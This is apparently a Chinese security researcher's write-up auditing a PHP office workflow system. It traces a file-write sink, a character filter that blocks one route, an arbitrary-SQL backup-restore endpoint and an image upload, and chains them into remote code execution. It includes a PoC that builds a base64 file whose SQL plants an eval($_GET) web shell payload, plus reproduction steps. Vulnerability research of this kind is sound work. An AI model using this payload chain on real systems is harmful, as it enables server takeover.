7ze4vF0vOWIyMj16y9t/DiZUfe+7IrZfFr7r1j6aIv9u6T1vdz3bhs7JIfLUmsuaYdd+eqHOJRiRQdt2TtcIpNSQnXHNv84RmtlVlbm5uJGNMVaefmpLPycqLYYSNiNOfKzI4vgAelLJgd9c2x60tzKTwnMyT/+OW2Lt9NqDI+RK83EiPuRXL72JFLFk6Mb7pW0xiWOm7GfZlB4Za6likrH5zCItWRzRUlGqvNqG+yErGIhOyc3OGRwbETRx/e99G+67Lbp8jTqK0tevyau2bHlFjf3VXW7PvNoYBPP646c1oxZ8qcZSpTUziZig6VdDPq625s1hE
<p blockindex=32>通过这么多处调用我们发现有一处调用(webmain/main/flow/flowAction.php#L557)会写入 php 中</p>
<pre blockindex=33><code class="hljs language-php"><span class=hljs-variable>$apaths</span> = <span class=hljs-string>''</span>.P.<span class=hljs-string>'/flow/input/mode_'</span>.<span class=hljs-variable>$modenum</span>.<span class=hljs-string>'Action.php'</span>;
<span class=hljs-variable>$apath</span> = <span class=hljs-string>''</span>.ROOT_PATH.<span class=hljs-string>'/'</span>.<span class=hljs-variable>$apaths</span>.<span class=hljs-string>''</span>;
<span class=hljs-keyword>if</span>(!file_exists(<span class=hljs-variable>$apath</span>)){
<span class=hljs-variable>$stra</span> = <span class=hljs-string>'&lt;?php
/**
* 此文件是流程模块【'.$modenum.'.'.$rs['name'].'】对应控制器接口文件。
*/ </span>....
<span class=hljs-keyword>$this</span>-&gt;rock-&gt;createtxt(<span class=hljs-variable>$apaths</span>, <span class=hljs-variable>$stra</span>);
}
</code></pre>
<p blockindex=34>要是我们能控制 <code>$modenum</code> 或是 <code>$rs['name']</code> 的内容就可以 getshell不过 <code>$modenum</code> 同时也控制了文件名所以我们只能通过控制 <code>$rs['name']</code> 来 getshell。</p>
<pre blockindex=35><code class="hljs language-php"><span class=hljs-variable>$setid</span> = (<span class=hljs-keyword>int</span>)<span class=hljs-keyword>$this</span>-&gt;get(<span class=hljs-string>'setid'</span>,<span class=hljs-string>'0'</span>);
<span class=hljs-variable>$rs</span> = m(<span class=hljs-string>'flow_set'</span>)-&gt;getone(<span class=hljs-string>"`id`='<span class=hljs-subst>$setid</span>'"</span>);
<span class=hljs-keyword>if</span>(!<span class=hljs-variable>$rs</span>)<span class=hljs-keyword>exit</span>(<span class=hljs-string>'sorry!'</span>);
<span class=hljs-variable>$rs</span>[<span class=hljs-string>'xxx'</span>] = count(explode(<span class=hljs-string>','</span>, (<span class=hljs-keyword>string</span>)<span class=hljs-variable>$rs</span>[<span class=hljs-string>'tables'</span>]));
<span class=hljs-variable>$modenum</span> = <span class=hljs-variable>$rs</span>[<span class=hljs-string>'num'</span>];
</code></pre>
<p blockindex=36><code>$rs</code> 数组是由 <code>flow_set</code> 数据库获取到的,</p>
<p blockindex=37><img src=data:image/png;base64,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
<p blockindex=38>下面是 <code>flow_se</code> 默认的数据信息,要是我们可以插入或者修改数据就可以。</p>
<h4 blockindex=39>3.2 寻找漏洞触发点</h4>
<p blockindex=40>根据常规思路我们只要寻找有插入 <code>flow_set</code> 表的方法即可。还真被我找到一个(webmain/main/flowview/flowviewAction.php)</p>
<pre blockindex=41><code class="hljs language-php"><span class=hljs-keyword>public</span> <span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>createmodeAction</span>(<span class=hljs-params></span>)
</span>{
<span class=hljs-variable>$name</span> = <span class=hljs-keyword>$this</span>-&gt;rock-&gt;xssrepstr(<span class=hljs-keyword>$this</span>-&gt;post(<span class=hljs-string>'name'</span>));
<span class=hljs-variable>$fields</span> = c(<span class=hljs-string>'pingyin'</span>)-&gt;get(<span class=hljs-variable>$name</span>,<span class=hljs-number>1</span>);
..
<span class=hljs-variable>$num</span> = <span class=hljs-string>'zz'</span>.<span class=hljs-variable>$fields</span>.<span class=hljs-string>''</span>;
<span class=hljs-variable>$id</span> = <span class=hljs-number>0</span>;
<span class=hljs-variable>$uarr</span>[<span class=hljs-string>'name'</span>] = <span class=hljs-variable>$name</span>;
<span class=hljs-variable>$uarr</span>[<span class=hljs-string>'num'</span>] = <span class=hljs-variable>$num</span>;
<span class=hljs-variable>$uarr</span>[<span class=hljs-string>'table'</span>] = <span class=hljs-variable>$num</span>;
...
<span class=hljs-variable>$id</span> = m(<span class=hljs-string>'flow_set'</span>)-&gt;insert(<span class=hljs-variable>$uarr</span>);
</code></pre>
<p blockindex=42>构造 poc闭合前面写入文件时的注释为</p>
<pre blockindex=43><code class="hljs language-php">*/<span class=hljs-keyword>eval</span>(<span class=hljs-variable>$_GET</span>[<span class=hljs-string>'a'</span>]);<span class=hljs-comment>/*
</span></code></pre>
<p blockindex=44>实际发现在 <code>$this-&gt;rock-&gt;xssrepstr</code> 中对特殊字符做了处理</p>
<pre blockindex=45><code class="hljs language-php"><span class=hljs-keyword>public</span> <span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>xssrepstr</span>(<span class=hljs-params><span class=hljs-variable>$str</span></span>)
</span>{
<span class=hljs-variable>$xpd</span> = explode(<span class=hljs-string>','</span>,<span class=hljs-string>'(,), , ,&lt;,&gt;,\\,*,&amp;,%,$,^,[,],{,},!,@,#,",+,?,;\''</span>);
<span class=hljs-variable>$xpd</span>[]= <span class=hljs-string>"\n"</span>;
<span class=hljs-keyword>return</span> str_ireplace(<span class=hljs-variable>$xpd</span>, <span class=hljs-string>''</span>, <span class=hljs-variable>$str</span>);
}
</code></pre>
<p blockindex=46>括号之类的都被过滤点了,这个利用点看来无法利用了,那我们只能再找找有没有可以执行 SQL 语句且传参会不进行过滤的点。</p>
<p blockindex=47>通过在 web 目录下查找系统重写的 sql 执行方法 <code>query</code>,在 webmain/system/beifen/beifenAction.php 方法中找到疑似执行任意 sql 语句的方法</p>
<pre blockindex=48><code class="hljs language-php"><span class=hljs-keyword>if</span>(getconfig(<span class=hljs-string>'systype'</span>)==<span class=hljs-string>'demo'</span>)<span class=hljs-keyword>exit</span>();
<span class=hljs-keyword>if</span>(<span class=hljs-keyword>$this</span>-&gt;adminid!=<span class=hljs-number>1</span>)<span class=hljs-keyword>return</span> <span class=hljs-string>'只有ID=1的管理员才可以用'</span>;
<span class=hljs-variable>$folder</span> = <span class=hljs-keyword>$this</span>-&gt;post(<span class=hljs-string>'folder'</span>);
<span class=hljs-variable>$sida</span> = explode(<span class=hljs-string>','</span>, <span class=hljs-keyword>$this</span>-&gt;post(<span class=hljs-string>'sid'</span>));
<span class=hljs-variable>$alltabls</span> = <span class=hljs-keyword>$this</span>-&gt;db-&gt;getalltable();
<span class=hljs-variable>$shul</span> = <span class=hljs-number>0</span>;
<span class=hljs-variable>$tablss</span> = <span class=hljs-string>''</span>;
<span class=hljs-keyword>foreach</span>(<span class=hljs-variable>$sida</span> <span class=hljs-keyword>as</span> <span class=hljs-variable>$id</span>){
<span class=hljs-variable>$ids</span> = substr(<span class=hljs-variable>$id</span>,<span class=hljs-number>0</span>,-<span class=hljs-number>5</span>);
<span class=hljs-variable>$ida</span> = explode(<span class=hljs-string>'_'</span>, <span class=hljs-variable>$ids</span>);
<span class=hljs-variable>$len</span> = count(<span class=hljs-variable>$ida</span>);
<span class=hljs-variable>$fieldshu</span> = <span class=hljs-variable>$ida</span>[<span class=hljs-variable>$len</span>-<span class=hljs-number>2</span>];
<span class=hljs-variable>$total</span> = <span class=hljs-variable>$ida</span>[<span class=hljs-variable>$len</span>-<span class=hljs-number>1</span>];
<span class=hljs-variable>$tab</span> = str_replace(<span class=hljs-string>'_'</span>.<span class=hljs-variable>$fieldshu</span>.<span class=hljs-string>'_'</span>.<span class=hljs-variable>$total</span>.<span class=hljs-string>'.json'</span>,<span class=hljs-string>''</span>, <span class=hljs-variable>$id</span>); <span class=hljs-comment>//表</span>
<span class=hljs-variable>$filepath</span> = <span class=hljs-string>''</span>.UPDIR.<span class=hljs-string>'/data/'</span>.<span class=hljs-variable>$folder</span>.<span class=hljs-string>'/'</span>.<span class=hljs-variable>$id</span>.<span class=hljs-string>''</span>;
<span class=hljs-keyword>if</span>(!file_exists(<span class=hljs-variable>$filepath</span>))<span class=hljs-keyword>continue</span>;
<span class=hljs-variable>$data</span> = m(<span class=hljs-string>'beifen'</span>)-&gt;getbfdata(<span class=hljs-string>''</span>,<span class=hljs-variable>$filepath</span>);
<span class=hljs-keyword>if</span>(!<span class=hljs-variable>$data</span>)<span class=hljs-keyword>continue</span>;
<span class=hljs-variable>$dataarr</span> = <span class=hljs-variable>$data</span>[<span class=hljs-variable>$tab</span>];
<span class=hljs-comment>//表不存在</span>
<span class=hljs-keyword>if</span>(!in_array(<span class=hljs-variable>$tab</span>, <span class=hljs-variable>$alltabls</span>)){
<span class=hljs-variable>$createsql</span> = arrvalue(<span class=hljs-variable>$dataarr</span>, <span class=hljs-string>'createsql'</span>);
<span class=hljs-keyword>if</span>(<span class=hljs-variable>$createsql</span>){
<span class=hljs-keyword>$this</span>-&gt;db-&gt;query(<span class=hljs-variable>$createsql</span>, <span class=hljs-literal>false</span>);
}<span class=hljs-keyword>else</span>{
<span class=hljs-keyword>continue</span>;
}
}
</code></pre>
<p blockindex=49>在该方法中通过处理传入的 <code>sid</code>,获取 table 名,如果 table 名不在数据库所有表名中时,会获取某个目录下 <code>$sid</code> 名的文件内容作为数组并取得 <code>createsql</code> 的内容进行 sql 语句执行。</p>
<p blockindex=50>那么就是说如果 <code>sid</code> 可控文件内容,同时 <code>sid</code> 不在表内那么我们就能构造修改 <code>flow_set</code> 数据的 sql而且目录 <code>folder</code> 也是可控的,似乎离成功近在咫尺了,我们找找有没有方法可以写入文件。</p>
<p blockindex=51>在用上面方法寻找文件写入的方法是我们发现好多文件名都是带了随机数,这不太好控制其位置,所以我们要找一个文件名不带随机数的写入点。</p>
<p blockindex=52>比如下面这个</p>
<pre blockindex=53><code class="hljs language-php"><span class=hljs-keyword>public</span> <span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>savetopdfAjax</span>(<span class=hljs-params></span>)
</span>{
<span class=hljs-variable>$imgbase64</span> = <span class=hljs-keyword>$this</span>-&gt;post(<span class=hljs-string>'imgbase64'</span>);
<span class=hljs-keyword>if</span>(isempt(<span class=hljs-variable>$imgbase64</span>))<span class=hljs-keyword>return</span> returnerror(<span class=hljs-string>'无数据'</span>);
<span class=hljs-variable>$path</span> = <span class=hljs-string>''</span>.UPDIR.<span class=hljs-string>'/logs/'</span>.date(<span class=hljs-string>'Y-m'</span>).<span class=hljs-string>'/abc.png'</span>;
<span class=hljs-variable>$bo</span> = <span class=hljs-keyword>$this</span>-&gt;rock-&gt;createtxt(<span class=hljs-variable>$path</span>, base64_decode(<span class=hljs-variable>$imgbase64</span>));
<span class=hljs-keyword>if</span>(!<span class=hljs-variable>$bo</span>)<span class=hljs-keyword>return</span> returnerror(<span class=hljs-string>''</span>.UPDIR.<span class=hljs-string>'目录无写入权限'</span>);
<span class=hljs-variable>$pa1</span> = <span class=hljs-string>''</span>.ROOT_PATH.<span class=hljs-string>'/include/fpdf/fpdf.php'</span>;
<span class=hljs-keyword>if</span>(!file_exists(<span class=hljs-variable>$pa1</span>))<span class=hljs-keyword>return</span> returnerror(<span class=hljs-string>'没有安装fpdf插件'</span>);
<span class=hljs-keyword>include_once</span>(<span class=hljs-variable>$pa1</span>);
<span class=hljs-variable>$fpdf</span> = <span class=hljs-keyword>new</span> FPDF();
<span class=hljs-variable>$fpdf</span>-&gt;AddPage();
<span class=hljs-variable>$fpdf</span>-&gt;Image(<span class=hljs-variable>$path</span>,<span class=hljs-number>0</span>,<span class=hljs-number>0</span>);
<span class=hljs-variable>$fpdf</span>-&gt;Output(<span class=hljs-string>'F'</span>,<span class=hljs-string>''</span>.UPDIR.<span class=hljs-string>'/logs/'</span>.date(<span class=hljs-string>'Y-m'</span>).<span class=hljs-string>'/to.pdf'</span>);
<span class=hljs-keyword>$this</span>-&gt;showreturn(<span class=hljs-string>'ok:'</span>.<span class=hljs-variable>$fpdf</span>-&gt;GetPageHeight().<span class=hljs-string>''</span>);
}
</code></pre>
<p blockindex=54>该方法首先是根据 <code>imgbase64</code> 上传一个 <code>abc.png</code> 文件,其次是一个 pdf 文件,因为默认没这个插件所以实际发包会报错,但不影响 <code>abc.png</code> 上传操作的执行。</p>
<p blockindex=55>于是构造文件内容的 poc 为</p>
<pre blockindex=56><code class="hljs language-php"><span class=hljs-meta>&lt;?php</span>
<span class=hljs-variable>$arr</span> = <span class=hljs-keyword>array</span>(
<span class=hljs-string>"abc.png"</span> =&gt; <span class=hljs-keyword>array</span>(<span class=hljs-string>"createsql"</span> =&gt; <span class=hljs-string>"update flow_set set name=\"*\/eval(<span class=hljs-subst>$_GET</span>\['pwa'\]);\/*\" where id=160;"</span>)
);
<span class=hljs-keyword>echo</span> base64_encode(json_encode(<span class=hljs-variable>$arr</span>));
</code></pre>
<p blockindex=57>第一层数组的键为文件名,为得是符合上面方法中 <code>$dataarr= $data[$tab]</code> 获取到我们后面数组 <code>$tab</code> 其实就是传入的文件名参数。第二层数组就是实际执行的 SQL 语句,其实 id 值是默认数据库中最后一行数据的 id 值。</p>
<p blockindex=58>此方法上传的文件位置为 <code>upload/logs/2024-12/abc.png</code></p>
<h3 blockindex=59>3.3 漏洞复现</h3>
<p blockindex=60>整个过程就是</p>
<ol blockindex=61>
<li><code>savetopdfAjax</code> 上传内容为恶意 sql 语句的图片。</li>
<li>请求接口触发图片内容中的恶意 SQL 语句</li>
<li>将更新数据表后带有 payload 的 name 值写入到 php 文件中,成功实现 getshell。</li>
</ol>
<p blockindex=62>首先上传图片</p>
<p blockindex=63><img src="data:image/png;base64,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
